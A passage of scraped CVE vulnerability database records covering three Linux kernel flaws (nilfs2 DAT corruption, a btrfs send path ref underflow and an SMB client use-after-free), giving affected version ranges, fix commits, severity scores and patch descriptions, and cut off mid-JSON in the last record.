Affected: c3a7abf06ce719a51139e62a034590be99abbc2c , < 2e2619ff5d0def4bb6c2037a32a6eaa28dd95c84 (git)
Affected: c3a7abf06ce719a51139e62a034590be99abbc2c , < 46b832e09d43b394ac0f6d9485d2b1a06593f0b7 (git)
Affected: c3a7abf06ce719a51139e62a034590be99abbc2c , < f69e81396aea66304d214f175aa371f1b5578862 (git)
Affected: c3a7abf06ce719a51139e62a034590be99abbc2c , < a8e4d098de1c0f4c5c1f2ed4633a860f0da6d713 (git)
Affected: c3a7abf06ce719a51139e62a034590be99abbc2c , < 82827ca21e7c8a91384c5baa656f78a5adfa4ab4 (git)
Affected: c3a7abf06ce719a51139e62a034590be99abbc2c , < f2f26b4a84a0ef41791bd2d70861c8eac748f4ba (git)

Linux

Affected: 2.6.31
Unaffected: 0 , < 2.6.31 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26956",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-06T18:55:00.382518Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-04T16:25:30.144Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.748Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b67189690eb4b7ecc84ae16fa1e880e0123eaa35"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9cbe1ad5f4354f4df1445e5f4883983328cd6d8e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c3b5c5c31e723b568f83d8cafab8629d9d830ffb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2e2619ff5d0def4bb6c2037a32a6eaa28dd95c84"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/46b832e09d43b394ac0f6d9485d2b1a06593f0b7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f69e81396aea66304d214f175aa371f1b5578862"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a8e4d098de1c0f4c5c1f2ed4633a860f0da6d713"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/82827ca21e7c8a91384c5baa656f78a5adfa4ab4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f2f26b4a84a0ef41791bd2d70861c8eac748f4ba"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/nilfs2/btree.c",
            "fs/nilfs2/direct.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b67189690eb4b7ecc84ae16fa1e880e0123eaa35",
              "status": "affected",
              "version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
              "versionType": "git"
            },
            {
              "lessThan": "9cbe1ad5f4354f4df1445e5f4883983328cd6d8e",
              "status": "affected",
              "version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
              "versionType": "git"
            },
            {
              "lessThan": "c3b5c5c31e723b568f83d8cafab8629d9d830ffb",
              "status": "affected",
              "version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
              "versionType": "git"
            },
            {
              "lessThan": "2e2619ff5d0def4bb6c2037a32a6eaa28dd95c84",
              "status": "affected",
              "version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
              "versionType": "git"
            },
            {
              "lessThan": "46b832e09d43b394ac0f6d9485d2b1a06593f0b7",
              "status": "affected",
              "version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
              "versionType": "git"
            },
            {
              "lessThan": "f69e81396aea66304d214f175aa371f1b5578862",
              "status": "affected",
              "version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
              "versionType": "git"
            },
            {
              "lessThan": "a8e4d098de1c0f4c5c1f2ed4633a860f0da6d713",
              "status": "affected",
              "version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
              "versionType": "git"
            },
            {
              "lessThan": "82827ca21e7c8a91384c5baa656f78a5adfa4ab4",
              "status": "affected",
              "version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
              "versionType": "git"
            },
            {
              "lessThan": "f2f26b4a84a0ef41791bd2d70861c8eac748f4ba",
              "status": "affected",
              "version": "c3a7abf06ce719a51139e62a034590be99abbc2c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/nilfs2/btree.c",
            "fs/nilfs2/direct.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.31"
            },
            {
              "lessThan": "2.6.31",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: fix failure to detect DAT corruption in btree and direct mappings\n\nPatch series \"nilfs2: fix kernel bug at submit_bh_wbc()\".\n\nThis resolves a kernel BUG reported by syzbot.  Since there are two\nflaws involved, I\u0027ve made each one a separate patch.\n\nThe first patch alone resolves the syzbot-reported bug, but I think\nboth fixes should be sent to stable, so I\u0027ve tagged them as such.\n\n\nThis patch (of 2):\n\nSyzbot has reported a kernel bug in submit_bh_wbc() when writing file data\nto a nilfs2 file system whose metadata is corrupted.\n\nThere are two flaws involved in this issue.\n\nThe first flaw is that when nilfs_get_block() locates a data block using\nbtree or direct mapping, if the disk address translation routine\nnilfs_dat_translate() fails with internal code -ENOENT due to DAT metadata\ncorruption, it can be passed back to nilfs_get_block().  This causes\nnilfs_get_block() to misidentify an existing block as non-existent,\ncausing both data block lookup and insertion to fail inconsistently.\n\nThe second flaw is that nilfs_get_block() returns a successful status in\nthis inconsistent state.  This causes the caller __block_write_begin_int()\nor others to request a read even though the buffer is not mapped,\nresulting in a BUG_ON check for the BH_Mapped flag in submit_bh_wbc()\nfailing.\n\nThis fixes the first issue by changing the return value to code -EINVAL\nwhen a conversion using DAT fails with code -ENOENT, avoiding the\nconflicting condition that leads to the kernel bug described above.  Here,\ncode -EINVAL indicates that metadata corruption was detected during the\nblock lookup, which will be properly handled as a file system error and\nconverted to -EIO when passing through the nilfs2 bmap layer."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:00:39.824Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b67189690eb4b7ecc84ae16fa1e880e0123eaa35"
        },
        {
          "url": "https://git.kernel.org/stable/c/9cbe1ad5f4354f4df1445e5f4883983328cd6d8e"
        },
        {
          "url": "https://git.kernel.org/stable/c/c3b5c5c31e723b568f83d8cafab8629d9d830ffb"
        },
        {
          "url": "https://git.kernel.org/stable/c/2e2619ff5d0def4bb6c2037a32a6eaa28dd95c84"
        },
        {
          "url": "https://git.kernel.org/stable/c/46b832e09d43b394ac0f6d9485d2b1a06593f0b7"
        },
        {
          "url": "https://git.kernel.org/stable/c/f69e81396aea66304d214f175aa371f1b5578862"
        },
        {
          "url": "https://git.kernel.org/stable/c/a8e4d098de1c0f4c5c1f2ed4633a860f0da6d713"
        },
        {
          "url": "https://git.kernel.org/stable/c/82827ca21e7c8a91384c5baa656f78a5adfa4ab4"
        },
        {
          "url": "https://git.kernel.org/stable/c/f2f26b4a84a0ef41791bd2d70861c8eac748f4ba"
        }
      ],
      "title": "nilfs2: fix failure to detect DAT corruption in btree and direct mappings",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26956",
    "datePublished": "2024-05-01T05:18:56.101Z",
    "dateReserved": "2024-02-19T14:20:24.200Z",
    "dateUpdated": "2025-05-04T09:00:39.824Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35935 (GCVE-0-2024-35935)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2026-01-05 10:35

Title

btrfs: send: handle path ref underflow in header iterate_inode_ref()

Summary

In the Linux kernel, the following vulnerability has been resolved: btrfs: send: handle path ref underflow in header iterate_inode_ref() Change BUG_ON to proper error handling if building the path buffer fails. The pointers are not printed so we don't accidentally leak kernel addresses.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/be2b6bcc936ae17f4…
	https://git.kernel.org/stable/c/024529c27c8b4b273…
	https://git.kernel.org/stable/c/4720d590c4cb5d9ff…
	https://git.kernel.org/stable/c/2f6174fd4ccf403b4…
	https://git.kernel.org/stable/c/9ae356c627b493323…
	https://git.kernel.org/stable/c/c1363ed8867b81ea1…
	https://git.kernel.org/stable/c/03938619a1e718b61…
	https://git.kernel.org/stable/c/3c6ee34c6f9cd1280…

Impacted products

Vendor

Product

Version

Linux

Affected: 31db9f7c23fbf7e95026143f79645de6507b583b , < be2b6bcc936ae17f42fff6494106a5660b35d8d3 (git)
Affected: 31db9f7c23fbf7e95026143f79645de6507b583b , < 024529c27c8b4b273325a169e078337c8279e229 (git)
Affected: 31db9f7c23fbf7e95026143f79645de6507b583b , < 4720d590c4cb5d9ffa0060b89743651cc7e995f9 (git)
Affected: 31db9f7c23fbf7e95026143f79645de6507b583b , < 2f6174fd4ccf403b42b3d5f0d1b6b496a0e5330a (git)
Affected: 31db9f7c23fbf7e95026143f79645de6507b583b , < 9ae356c627b493323e1433dcb27a26917668c07c (git)
Affected: 31db9f7c23fbf7e95026143f79645de6507b583b , < c1363ed8867b81ea169fba2ccc14af96a85ed183 (git)
Affected: 31db9f7c23fbf7e95026143f79645de6507b583b , < 03938619a1e718b6168ae4528e1b0f979293f1a5 (git)
Affected: 31db9f7c23fbf7e95026143f79645de6507b583b , < 3c6ee34c6f9cd12802326da26631232a61743501 (git)

Linux

Affected: 3.6
Unaffected: 0 , < 3.6 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.86 , ≤ 6.1.* (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.026Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/be2b6bcc936ae17f42fff6494106a5660b35d8d3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/024529c27c8b4b273325a169e078337c8279e229"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4720d590c4cb5d9ffa0060b89743651cc7e995f9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2f6174fd4ccf403b42b3d5f0d1b6b496a0e5330a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9ae356c627b493323e1433dcb27a26917668c07c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c1363ed8867b81ea169fba2ccc14af96a85ed183"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/03938619a1e718b6168ae4528e1b0f979293f1a5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3c6ee34c6f9cd12802326da26631232a61743501"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35935",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:40:55.413538Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:15.162Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/send.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "be2b6bcc936ae17f42fff6494106a5660b35d8d3",
              "status": "affected",
              "version": "31db9f7c23fbf7e95026143f79645de6507b583b",
              "versionType": "git"
            },
            {
              "lessThan": "024529c27c8b4b273325a169e078337c8279e229",
              "status": "affected",
              "version": "31db9f7c23fbf7e95026143f79645de6507b583b",
              "versionType": "git"
            },
            {
              "lessThan": "4720d590c4cb5d9ffa0060b89743651cc7e995f9",
              "status": "affected",
              "version": "31db9f7c23fbf7e95026143f79645de6507b583b",
              "versionType": "git"
            },
            {
              "lessThan": "2f6174fd4ccf403b42b3d5f0d1b6b496a0e5330a",
              "status": "affected",
              "version": "31db9f7c23fbf7e95026143f79645de6507b583b",
              "versionType": "git"
            },
            {
              "lessThan": "9ae356c627b493323e1433dcb27a26917668c07c",
              "status": "affected",
              "version": "31db9f7c23fbf7e95026143f79645de6507b583b",
              "versionType": "git"
            },
            {
              "lessThan": "c1363ed8867b81ea169fba2ccc14af96a85ed183",
              "status": "affected",
              "version": "31db9f7c23fbf7e95026143f79645de6507b583b",
              "versionType": "git"
            },
            {
              "lessThan": "03938619a1e718b6168ae4528e1b0f979293f1a5",
              "status": "affected",
              "version": "31db9f7c23fbf7e95026143f79645de6507b583b",
              "versionType": "git"
            },
            {
              "lessThan": "3c6ee34c6f9cd12802326da26631232a61743501",
              "status": "affected",
              "version": "31db9f7c23fbf7e95026143f79645de6507b583b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/send.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.6"
            },
            {
              "lessThan": "3.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.86",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.86",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: send: handle path ref underflow in header iterate_inode_ref()\n\nChange BUG_ON to proper error handling if building the path buffer\nfails. The pointers are not printed so we don\u0027t accidentally leak kernel\naddresses."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:35:50.768Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/be2b6bcc936ae17f42fff6494106a5660b35d8d3"
        },
        {
          "url": "https://git.kernel.org/stable/c/024529c27c8b4b273325a169e078337c8279e229"
        },
        {
          "url": "https://git.kernel.org/stable/c/4720d590c4cb5d9ffa0060b89743651cc7e995f9"
        },
        {
          "url": "https://git.kernel.org/stable/c/2f6174fd4ccf403b42b3d5f0d1b6b496a0e5330a"
        },
        {
          "url": "https://git.kernel.org/stable/c/9ae356c627b493323e1433dcb27a26917668c07c"
        },
        {
          "url": "https://git.kernel.org/stable/c/c1363ed8867b81ea169fba2ccc14af96a85ed183"
        },
        {
          "url": "https://git.kernel.org/stable/c/03938619a1e718b6168ae4528e1b0f979293f1a5"
        },
        {
          "url": "https://git.kernel.org/stable/c/3c6ee34c6f9cd12802326da26631232a61743501"
        }
      ],
      "title": "btrfs: send: handle path ref underflow in header iterate_inode_ref()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35935",
    "datePublished": "2024-05-19T10:10:42.319Z",
    "dateReserved": "2024-05-17T13:50:33.130Z",
    "dateUpdated": "2026-01-05T10:35:50.768Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35862 (GCVE-0-2024-35862)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2026-01-05 10:35

Title

smb: client: fix potential UAF in smb2_is_network_name_deleted()

Summary

In the Linux kernel, the following vulnerability has been resolved: smb: client: fix potential UAF in smb2_is_network_name_deleted() Skip sessions that are being teared down (status == SES_EXITING) to avoid UAF.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f9414004798d9742c…
	https://git.kernel.org/stable/c/aa582b33f94453fde…
	https://git.kernel.org/stable/c/d919b6ea15ffa56fb…
	https://git.kernel.org/stable/c/63981561ffd2d4987…

Impacted products

Vendor

Product

Version

Linux

Affected: 9e550b085206544bd03a8b1dd58a5414e9508351 , < f9414004798d9742c1af23a1d839fe6a9503751c (git)
Affected: 9e550b085206544bd03a8b1dd58a5414e9508351 , < aa582b33f94453fdeaff1e7d0aa252c505975e01 (git)
Affected: 9e550b085206544bd03a8b1dd58a5414e9508351 , < d919b6ea15ffa56fbafef4a1d92f47aeda9af645 (git)
Affected: 9e550b085206544bd03a8b1dd58a5414e9508351 , < 63981561ffd2d4987807df4126f96a11e18b0c1d (git)

Linux

Affected: 5.12
Unaffected: 0 , < 5.12 (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.581Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f9414004798d9742c1af23a1d839fe6a9503751c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/aa582b33f94453fdeaff1e7d0aa252c505975e01"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d919b6ea15ffa56fbafef4a1d92f47aeda9af645"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/63981561ffd2d4987807df4126f96a11e18b0c1d"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35862",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:41:27.598442Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:17.367Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/smb2ops.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f9414004798d9742c1af23a1d839fe6a9503751c",
              "status": "affected",
              "version": "9e550b085206544bd03a8b1dd58a5414e9508351",
              "versionType": "git"
            },
            {
              "lessThan": "aa582b33f94453fdeaff1e7d0aa252c505975e01",
              "status": "affected",
              "version": "9e550b085206544bd03a8b1dd58a5414e9508351",
              "versionType": "git"
            },
            {
              "lessThan": "d919b6ea15ffa56fbafef4a1d92f47aeda9af645",
              "status": "affected",
              "version": "9e550b085206544bd03a8b1dd58a5414e9508351",
              "versionType": "git"
            },
            {
              "lessThan": "63981561ffd2d4987807df4126f96a11e18b0c1d",
              "status": "affected",
              "version": "9e550b085206544bd03a8b1dd58a5414e9508351",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/smb2ops.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.12"
            },
            {
              "lessThan": "5.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
